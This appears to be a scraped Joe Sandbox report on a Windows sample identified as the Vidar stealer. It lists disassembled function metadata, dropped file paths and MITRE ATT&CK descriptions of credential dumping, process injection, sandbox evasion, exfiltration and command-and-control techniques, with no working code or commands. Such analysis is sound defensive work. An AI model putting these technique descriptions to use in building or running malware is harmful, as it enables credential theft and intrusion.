Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd

Similarity

API ID: CloseEnvironmentHandleVariable
String ID: MOZ_SKELETON_UI_RESTARTING
API String ID: 297244470-335682676
Opcode ID: 2da40d1af9996111197d879e74cc205c24a8592dc78e06310da1ad1f6a00ac7a
Instruction ID: 05aeab9702695c59f8bd2fa1ea0e8a7e897cffd93e6ecd1ba8decd7bf60a9a22
Opcode Fuzzy Hash: 2da40d1af9996111197d879e74cc205c24a8592dc78e06310da1ad1f6a00ac7a
Instruction Fuzzy Hash: 1AE04F30104680BBEB105B6CD9087667FEDDB17775F048544E669936D1C3BEF848C7A5

Uniqueness

Uniqueness Score: -1.00%

Function 6BB750E0 Relevance: 5.2, APIs: 4, Instructions: 213COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6BB74E9C,?,?,?,?,?), ref: 6BB7510A
memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6BB74E9C,?,?,?,?,?), ref: 6BB75167
memcpy.VCRUNTIME140(036477E8,?,?,?,?,?), ref: 6BB75196
memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6BB74E9C), ref: 6BB75234

Memory Dump Source

Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true

Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 933be0c35787ef1d59b8af2b73a0f28f4363cc6c90fe8bc4464883a815d3fd0d
Instruction ID: 48777f03f1bdb1afb068c4ac273db64da84ff0be25537b1703db87b86c61f5e8
Opcode Fuzzy Hash: 933be0c35787ef1d59b8af2b73a0f28f4363cc6c90fe8bc4464883a815d3fd0d
Instruction Fuzzy Hash: 8891CF75A04696CFCB24DF08C490A5ABBA1FF89318B19859CDD685B725D336FC42CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 6BBB08F0 Relevance: 5.2, APIs: 4, Instructions: 165COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6BBFE7DC), ref: 6BBB0918
LeaveCriticalSection.KERNEL32(6BBFE7DC), ref: 6BBB09A6
EnterCriticalSection.KERNEL32(6BBFE7DC,?,00000000), ref: 6BBB09F3
LeaveCriticalSection.KERNEL32(6BBFE7DC), ref: 6BBB0ACB

Memory Dump Source

Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true

Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 964c41e383ec08968eb674c04644bdcaa4ed8540caf86416035d13e5e321791e
Instruction ID: 7ae3df2d4761f5aa94f719960962002021663e2620695821c1997e89927f6ee8
Opcode Fuzzy Hash: 964c41e383ec08968eb674c04644bdcaa4ed8540caf86416035d13e5e321791e
Instruction Fuzzy Hash: 99516B32B11A94CFEF189B28D54063D73AAEB82F607544579DD6597780DF3AE802C780

Uniqueness

Uniqueness Score: -1.00%

Function 6BBD59C0 Relevance: 5.2, APIs: 4, Instructions: 155COMMON

Download Yara Rule

APIs

malloc.MOZGLUE(?,?,?,?,?,?,?,?,00000008,?,6BBAE56A,?,|UrlbarCSSSpan,0000000E,?), ref: 6BBD5A47
memset.VCRUNTIME140(00000000,00000000,?,?,?,?,?,?,?,?,?,00000008,?,6BBAE56A,?,|UrlbarCSSSpan), ref: 6BBD5A5C
free.MOZGLUE(?), ref: 6BBD5A97
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000010), ref: 6BBD5B9D

Memory Dump Source

Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true

Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd

Similarity

API ID: free$mallocmemset
String ID:
API String ID: 2682772760-0
Opcode ID: 2905a1d59b23b9eb595734f3a7f89dd0b982f1cfae0f8206a667a9ccacb84018
Instruction ID: 77e397350e99b76fbe4dbeda59b844cb03066fe470ce00a8c956c99ca1f91b45
Opcode Fuzzy Hash: 2905a1d59b23b9eb595734f3a7f89dd0b982f1cfae0f8206a667a9ccacb84018
Instruction Fuzzy Hash: B9516D705087909FD700CF28C8C0B1ABBE5FF8A358F04C96EE9899B246D778D945CB66

Uniqueness

Uniqueness Score: -1.00%

Function 6BB823D8 Relevance: 5.1, APIs: 4, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true

Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bc6d21a744ad1fd4cd3c91ef8e98640043d9ad0f37a03345a33afef75e4667c
Instruction ID: 3cff2a92c0a3becf640b1adb78cf1f415c51fd93d152cd4e2e672647732162c6
Opcode Fuzzy Hash: 4bc6d21a744ad1fd4cd3c91ef8e98640043d9ad0f37a03345a33afef75e4667c
Instruction Fuzzy Hash: 8C51AEB1A00246DFDB04CF28C9D079ABBB1FF48314F598269D9199B381D775E895CF90

Uniqueness

Uniqueness Score: -1.00%

Function 6BBD6180 Relevance: 5.1, APIs: 4, Instructions: 107COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000024), ref: 6BBD61DD
memcpy.VCRUNTIME140(00000000,00000024,-00000070), ref: 6BBD622C
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6BBD6250
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BBD6292

Memory Dump Source

Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true

Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd

Similarity

API ID: malloc$freememcpy
String ID:
API String ID: 4259248891-0
Opcode ID: 0c2503569f4e06496410b39cd9aa7c4a7c4857a5cf4ac88be72128e651f69265
Instruction ID: 6c883b8ed94f543493c311197f268e43fe43d8ee8427cb5e5fdc2e8ac1fb8d05
Opcode Fuzzy Hash: 0c2503569f4e06496410b39cd9aa7c4a7c4857a5cf4ac88be72128e651f69265
Instruction Fuzzy Hash: 15310571A00A4A8FDB04CF2CD881AAAB3E9FF95304F108579C55AD7251EB39E698CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6BB8BBE0 Relevance: 5.1, APIs: 4, Instructions: 96COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000010,?,?,?,?,?,?,?,?,?,?,?,?,?,00000008), ref: 6BB8BBF4
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,00000008), ref: 6BB8BC66
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000008), ref: 6BB8BC96
memcpy.VCRUNTIME140(00000000,00000010,0000001F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BB8BCCE

Memory Dump Source

Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true

Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd

Similarity

API ID: malloc$freememcpy
String ID:
API String ID: 4259248891-0
Opcode ID: fc3c2a52c21d569032300b94babbecaf41e71113811ebb750cb30cb8333f055b
Instruction ID: 11b3c35ad58f597035899676cd78eaea6824bfa91527c18daa999cf84e4f2b61
Opcode Fuzzy Hash: fc3c2a52c21d569032300b94babbecaf41e71113811ebb750cb30cb8333f055b
Instruction Fuzzy Hash: 07215071F002458BF7208F3DDC8172EB2E9EB81304F148A38D85AD7391EEB6E5848B61

Uniqueness

Uniqueness Score: -1.00%

Function 6BB739A0 Relevance: 5.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6BBFE744,6BBD7765,00000000,6BBD7765,?,6BB96112), ref: 6BB739AF
LeaveCriticalSection.KERNEL32(6BBFE744,?,6BB96112), ref: 6BB73A34
EnterCriticalSection.KERNEL32(6BBFE784,6BB96112), ref: 6BB73A4B
LeaveCriticalSection.KERNEL32(6BBFE784), ref: 6BB73A5F

Memory Dump Source

Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true

Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: e7d450235bef7ba6f7f004c27fe69914ca219f81d7b9c8adea1ae8e017422e76
Instruction ID: 9d89a75b9e2de37544247e1b76b8e9b4d17e6a1469c0628de4dfe1c3fbd75af7
Opcode Fuzzy Hash: e7d450235bef7ba6f7f004c27fe69914ca219f81d7b9c8adea1ae8e017422e76
Instruction Fuzzy Hash: 682138326057818FCB349F79D852A3E73E9EB85750724053DD57683780D73AE802C752

Uniqueness

Uniqueness Score: -1.00%

Function 6BB8B940 Relevance: 5.1, APIs: 4, Instructions: 64COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,?), ref: 6BB8B96F
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000020), ref: 6BB8B99A
memcpy.VCRUNTIME140(00000000,?,?), ref: 6BB8B9B0
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BB8B9B9

Memory Dump Source

Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true

Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd

Similarity

API ID: memcpy$freemalloc
String ID:
API String ID: 3313557100-0
Opcode ID: 1d443105ff43bc601ed47607a55ae424abf57e093c5de986441593ffcda1bb7c
Instruction ID: b86ada110f96af5ea1cd80f7228b9316f03456c0b84a6ff5cb20e9eb6f7effed
Opcode Fuzzy Hash: 1d443105ff43bc601ed47607a55ae424abf57e093c5de986441593ffcda1bb7c
Instruction Fuzzy Hash: 90114CB1A002059FCB14CF69D8808ABB7F9FF98214B14853AE91AD3311E735E9598BA1

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report wxfSIz4PAi.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Vidar

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Exploits

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\CGIDAAAKJJDBGCBFCBGI

C:\ProgramData\CGIDAAAKJJDBGCBFCBGIIDHCFB

C:\ProgramData\DGDBKFBA

C:\ProgramData\DTBZGIOOSO.xlsx

C:\ProgramData\FHJKKECFIECAKECAFBGCAFHDHJ

C:\ProgramData\JEHJKJEB

C:\ProgramData\JEHJKJEBGHJJKEBGIECAAFIJKJ

C:\ProgramData\KATAXZVCPS.docx

C:\ProgramData\KKFBAAFCGIEGDHIEBFII

Windows Analysis Report
wxfSIz4PAi.exe

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre